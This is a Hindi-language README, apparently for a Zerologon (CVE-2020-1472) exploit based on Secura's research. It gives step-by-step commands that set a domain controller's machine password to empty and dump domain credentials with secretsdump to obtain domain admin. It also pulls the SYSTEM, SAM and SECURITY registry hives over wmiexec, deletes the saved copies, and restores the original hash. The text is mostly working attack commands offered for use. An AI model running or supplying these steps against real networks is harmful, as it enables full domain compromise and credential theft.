
zerologon cve-2020-1472 के लिए शोषण
शोषण कोड https://www.secura.com/blog/zero-logon और https://github.com/SecuraBV/CVE-2020-1472 पर आधारित है। मूल शोध और स्कैनर Secura द्वारा, संशोधन RiskSense Inc. द्वारा।
शोषण करने के लिए, आपके पास मौजूद किसी भी पिछले Impacket इंस्टॉलेशन को हटा दें और https://github.com/SecureAuthCorp/impacket/commit/b867b21 या उससे नए से Impacket इंस्टॉल करें। फिर, करें:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
यदि यह सफल होता है तो आप तब सक्षम होंगे:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
जो आपको डोमेन एडमिन प्राप्त करना चाहिए। उसके बाद, secretsdump से एक क्रेडेंशियल के साथ लक्ष्य DC पर wmiexec.py का उपयोग करें और करें
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
फिर आप कर सकते हैं:
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
और यह आपको मशीन खाते का मूल NT हैश दिखाना चाहिए। फिर आप उस मूल मशीन खाता हैश को डोमेन में पुनः स्थापित कर सकते हैं:
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
DC के सामान्य रूप से संचालन जारी रखने के लिए मूल हैश को पुनः स्थापित करना आवश्यक है।